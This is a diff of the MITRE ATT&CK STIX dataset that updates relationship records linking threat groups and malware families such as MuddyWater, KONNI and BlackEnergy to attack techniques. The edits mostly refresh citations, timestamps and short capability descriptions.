+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
}
],
"source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
"relationship_type": "uses",
"target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
"type": "relationship",
- "modified": "2020-03-20T16:39:42.446Z",
+ "modified": "2020-06-29T13:26:01.392Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -111180,16 +112375,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--60d50676-459a-47dd-92e9-a827a9fe9c58",
"relationship_type": "uses",
"target_ref": "attack-pattern--6495ae23-3ab4-43c5-a94f-5638a2c31fd2",
"type": "relationship",
- "modified": "2020-02-18T03:54:11.640Z",
+ "modified": "2020-04-21T23:09:31.596Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -111532,15 +112727,20 @@
"description": "Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.",
"url": "https://securelist.com/muddywater/88059/",
"source_name": "Securelist MuddyWater Oct 2018"
+ },
+ {
+ "source_name": "ClearSky MuddyWater June 2019",
+ "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf",
+ "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020."
}
],
- "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that has the capability to execute malware via COM and Outlook.(Citation: Securelist MuddyWater Oct 2018)",
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.(Citation: Securelist MuddyWater Oct 2018)(Citation: ClearSky MuddyWater June 2019)",
"id": "relationship--319dbc0e-5026-4796-bfd9-43ef3d30eb8d",
"source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
"relationship_type": "uses",
"target_ref": "attack-pattern--2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64",
"type": "relationship",
- "modified": "2020-03-20T15:50:57.899Z",
+ "modified": "2020-05-21T12:58:00.382Z",
"created": "2019-01-30T17:33:40.954Z"
},
{
@@ -111667,12 +112867,12 @@
"url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
}
],
- "source_ref": "malware--d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add"
},
{
"id": "relationship--de840f88-b9d0-4f7e-b5c0-b666faa2d92f",
@@ -111835,9 +113035,9 @@
],
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
},
{
"source_name": "Securelist BlackEnergy Nov 2014",
@@ -111849,7 +113049,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475",
"type": "relationship",
- "modified": "2019-06-24T17:08:51.800Z",
+ "modified": "2020-06-02T16:14:00.468Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -111908,16 +113108,15 @@
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
}
],
"source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"relationship_type": "uses",
"target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.147Z",
+ "modified": "2020-05-14T15:14:33.554Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -112044,12 +113243,12 @@
"url": "http://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks"
}
],
- "source_ref": "malware--9e9b9415-a7df-406b-b14d-92bfe6809fbe",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--9e9b9415-a7df-406b-b14d-92bfe6809fbe",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--33e3573b-0f18-417c-be17-727863fc21ec",
@@ -112128,12 +113327,12 @@
"url": "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/"
}
],
- "source_ref": "tool--90ec2b22-7061-4469-b539-0989ec4f96c2",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "tool--90ec2b22-7061-4469-b539-0989ec4f96c2",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5"
},
{
"id": "relationship--4b23ac99-3761-46f0-ad5d-2cf63a95036a",
@@ -112862,12 +114061,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-061518-4639-99"
}
],
- "source_ref": "malware--48523614-309e-43bf-a2b8-705c2b45d7b2",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--48523614-309e-43bf-a2b8-705c2b45d7b2",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4"
},
{
"id": "relationship--77b9e1c5-8241-4260-8125-4bc2e1206b9c",
@@ -112968,7 +114167,7 @@
"external_references": [
{
"source_name": "Palo Alto Gamaredon Feb 2017",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
@@ -112976,7 +114175,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
- "modified": "2020-03-17T02:15:40.344Z",
+ "modified": "2020-06-22T17:54:16.033Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -113208,12 +114407,12 @@
"url": "https://www.us-cert.gov/ncas/analysis-reports/AR18-221A"
}
],
- "source_ref": "malware--11e36d5b-6a92-4bf9-8eb7-85eb24f59e22",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--11e36d5b-6a92-4bf9-8eb7-85eb24f59e22",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--a802d52a-01f4-44c8-b80d-d2c746e1e31d",
@@ -113355,12 +114554,12 @@
"url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/"
}
],
- "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18"
},
{
"id": "relationship--79958f80-16ca-4287-b691-9c748d6baf66",
@@ -113775,27 +114974,6 @@
"modified": "2020-03-17T02:22:39.568Z",
"created": "2018-10-17T00:14:20.652Z"
},
- {
- "id": "relationship--e9b0af76-f6b1-43b0-ac0e-ea23582f575b",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "intrusion-set--7636484c-adc5-45d4-9bfe-c3e062fbc4a0",
- "relationship_type": "uses",
- "target_ref": "malware--e48df773-7c95-4a4c-ba70-ea3d15900148",
- "external_references": [
- {
- "url": "http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf",
- "description": "ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.",
- "source_name": "ClearSky Charming Kitten Dec 2017"
- }
- ],
- "description": "(Citation: ClearSky Charming Kitten Dec 2017)",
- "type": "relationship",
- "modified": "2019-03-22T19:59:49.430Z",
- "created": "2018-01-16T16:13:52.465Z"
- },
{
"id": "relationship--318afc9f-92f3-4262-af70-b2e045b87737",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -113852,12 +115030,12 @@
"url": "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
}
],
- "source_ref": "malware--b1de6916-7a22-4460-8d26-6b5483ffaa2a",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--b1de6916-7a22-4460-8d26-6b5483ffaa2a",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4"
},
{
"id": "relationship--ab7eb363-c775-4065-a80d-1b324f22d0b8",
@@ -114126,12 +115304,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html"
}
],
- "source_ref": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00"
},
{
"id": "relationship--cc5a6d27-5c74-4f53-afc1-390c71bfae7c",
@@ -114679,7 +115857,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -114688,7 +115866,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.315Z",
+ "modified": "2020-04-16T19:41:40.704Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -114705,12 +115883,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-3909-99"
}
],
- "source_ref": "malware--c251e4a5-9a2e-4166-8e42-442af75c3b9a",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--c251e4a5-9a2e-4166-8e42-442af75c3b9a",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add"
},
{
"id": "relationship--1bc5328a-e079-4478-9d04-d840626d4976",
@@ -114773,12 +115951,12 @@
"url": "https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf"
}
],
- "source_ref": "malware--17b40f60-729f-4fe8-8aea-cc9ee44a95d5",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--17b40f60-729f-4fe8-8aea-cc9ee44a95d5",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--a29d9514-3284-4ac2-a93a-e17750519534",
@@ -114937,14 +116115,14 @@
"target_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
"external_references": [
{
- "url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf",
+ "source_name": "Symantec Waterbug",
"description": "Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015.",
- "source_name": "Symantec Waterbug"
+ "url": "https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1"
}
],
"description": "(Citation: Symantec Waterbug)",
"type": "relationship",
- "modified": "2019-07-14T21:04:45.836Z",
+ "modified": "2020-06-29T13:27:46.711Z",
"created": "2017-05-31T21:33:27.046Z"
},
{
@@ -115340,27 +116518,6 @@
"modified": "2019-09-03T18:50:16.552Z",
"created": "2017-12-14T16:46:06.044Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "source_name": "Talos Agent Tesla Oct 2018",
- "url": "https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html",
- "description": "Brumaghin, E., et al. (2018, October 15). Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox. Retrieved November 5, 2018."
- }
- ],
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) exploits CVE-2017-11882 in Microsoft\u2019s Equation Editor to execute a process.(Citation: Talos Agent Tesla Oct 2018)",
- "id": "relationship--3f60930f-e055-4a83-b8a5-fa84c139ee5b",
- "source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
- "type": "relationship",
- "modified": "2019-04-16T14:30:35.428Z",
- "created": "2019-01-29T18:44:04.945Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -115712,14 +116869,14 @@
"source_name": "iSIGHT Sandworm 2014"
},
{
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
"source_name": "F-Secure BlackEnergy 2014"
}
],
"description": "(Citation: iSIGHT Sandworm 2014)(Citation: F-Secure BlackEnergy 2014)",
"type": "relationship",
- "modified": "2019-03-25T16:55:26.213Z",
+ "modified": "2020-06-02T16:14:00.643Z",
"created": "2017-05-31T21:33:27.070Z"
},
{
@@ -115752,16 +116909,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c",
"type": "relationship",
- "modified": "2020-03-16T23:58:10.722Z",
+ "modified": "2020-04-21T23:09:31.613Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -115799,12 +116956,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html"
}
],
- "source_ref": "malware--ad4f146f-e3ec-444a-ba71-24bffd7f0f8e",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--ad4f146f-e3ec-444a-ba71-24bffd7f0f8e",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--921c2a85-eab7-4cfc-9ac5-98a463262c17",
@@ -116109,15 +117266,20 @@
"description": "Horejsi, J., et al. (2018, March 14). Tropic Trooper\u2019s New Strategy. Retrieved November 9, 2018.",
"url": "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/",
"source_name": "TrendMicro Tropic Trooper Mar 2018"
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
}
],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) uses SSL to connect to C2 servers.(Citation: TrendMicro Tropic Trooper Mar 2018)",
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used SSL to connect to C2 servers.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: TrendMicro Tropic Trooper May 2020)",
"id": "relationship--6a8356c2-5a79-40b7-bb8e-b7d9dffbe523",
"source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
"relationship_type": "uses",
"target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada",
"type": "relationship",
- "modified": "2020-03-21T00:37:48.781Z",
+ "modified": "2020-05-21T18:57:34.313Z",
"created": "2019-01-29T20:17:49.316Z"
},
{
@@ -116630,18 +117792,23 @@
"source_name": "Securelist MuddyWater Oct 2018"
},
{
- "source_name": "Talos MuddyWater May 2019",
+ "description": "Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019.",
"url": "https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html",
- "description": "Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019."
+ "source_name": "Talos MuddyWater May 2019"
+ },
+ {
+ "source_name": "Reaqta MuddyWater November 2017",
+ "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
+ "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020."
}
],
- "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that can collect the victim\u2019s OS version and machine name.(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)",
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that can collect the victim\u2019s OS version and machine name.(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)(Citation: Reaqta MuddyWater November 2017)",
"id": "relationship--9c5c8dbe-ec34-46f9-b4af-0a6e73f00c89",
"source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2019-06-28T15:30:58.850Z",
+ "modified": "2020-05-18T19:04:38.075Z",
"created": "2019-01-30T17:33:41.085Z"
},
{
@@ -116755,18 +117922,23 @@
],
"external_references": [
{
- "description": "Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018.",
+ "source_name": "Talos Konni May 2017",
"url": "https://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html",
- "source_name": "Talos Konni May 2017"
+ "description": "Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018."
+ },
+ {
+ "source_name": "Medium KONNI Jan 2020",
+ "url": "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
+ "description": "Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020."
}
],
- "description": "[KONNI](https://attack.mitre.org/software/S0356) can gather the OS version, architecture information, connected drives, hostname, and computer name from the victim\u2019s machine.(Citation: Talos Konni May 2017)",
+ "description": "[KONNI](https://attack.mitre.org/software/S0356) can gather the OS version, architecture information, connected drives, hostname, and computer name from the victim\u2019s machine and has used systeminfo.exe to get a snapshot of the current system state of the target machine.(Citation: Talos Konni May 2017)(Citation: Medium KONNI Jan 2020)",
"id": "relationship--172da5b1-cf68-468a-8208-b15ea5c813dc",
"source_ref": "malware--86b92f6c-9c05-4c51-b361-4c7bb13e21a1",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2019-07-26T18:47:19.504Z",
+ "modified": "2020-04-28T18:12:13.776Z",
"created": "2019-01-31T00:36:41.034Z"
},
{
@@ -117270,12 +118442,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-061518-4639-99"
}
],
- "source_ref": "malware--48523614-309e-43bf-a2b8-705c2b45d7b2",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--48523614-309e-43bf-a2b8-705c2b45d7b2",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0"
},
{
"id": "relationship--ed45fb1c-048a-4378-8c15-6f6ea0c72d7a",
@@ -117579,12 +118751,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html"
}
],
- "source_ref": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b"
},
{
"id": "relationship--4eec017c-8bf2-4eda-8c92-15926fc7e5aa",
@@ -117690,27 +118862,6 @@
"modified": "2020-03-17T17:00:43.701Z",
"created": "2018-10-17T00:14:20.652Z"
},
- {
- "id": "relationship--0179577d-b2a2-42b7-9f5e-944e5bf75d92",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Pupy](https://attack.mitre.org/software/S0192) can use Obfs3, a pluggable transport, to add another layer of encryption and obfuscate TLS.(Citation: GitHub Pupy)",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "url": "https://github.com/n1nj4sec/pupy",
- "description": "Nicolas Verdier. (n.d.). Retrieved January 29, 2018.",
- "source_name": "GitHub Pupy"
- }
- ],
- "source_ref": "tool--cb69b20d-56d0-41ab-8440-4a4b251614d4",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118",
- "type": "relationship",
- "modified": "2020-03-23T16:58:25.255Z",
- "created": "2018-04-18T17:59:24.739Z"
- },
{
"id": "relationship--2e367a09-1d94-4ea4-984c-a592b769fffa",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -117777,15 +118928,15 @@
{
"id": "relationship--e8a77e9f-594d-429a-9eb0-51502af84c14",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used PowerShell for execution.(Citation: FireEye MuddyWater Mar 2018)(Citation: MuddyWater TrendMicro June 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: Talos MuddyWater May 2019)",
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used PowerShell for execution.(Citation: FireEye MuddyWater Mar 2018)(Citation: MuddyWater TrendMicro June 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: Talos MuddyWater May 2019)(Citation: Reaqta MuddyWater November 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "FireEye MuddyWater Mar 2018",
+ "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html",
"description": "Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.",
- "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html"
+ "source_name": "FireEye MuddyWater Mar 2018"
},
{
"source_name": "MuddyWater TrendMicro June 2018",
@@ -117798,26 +118949,31 @@
"source_name": "Securelist MuddyWater Oct 2018"
},
{
- "source_name": "Symantec MuddyWater Dec 2018",
+ "description": "Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.",
"url": "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group",
- "description": "Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018."
+ "source_name": "Symantec MuddyWater Dec 2018"
},
{
- "source_name": "ClearSky MuddyWater Nov 2018",
+ "description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.",
"url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
- "description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018."
+ "source_name": "ClearSky MuddyWater Nov 2018"
},
{
- "source_name": "Talos MuddyWater May 2019",
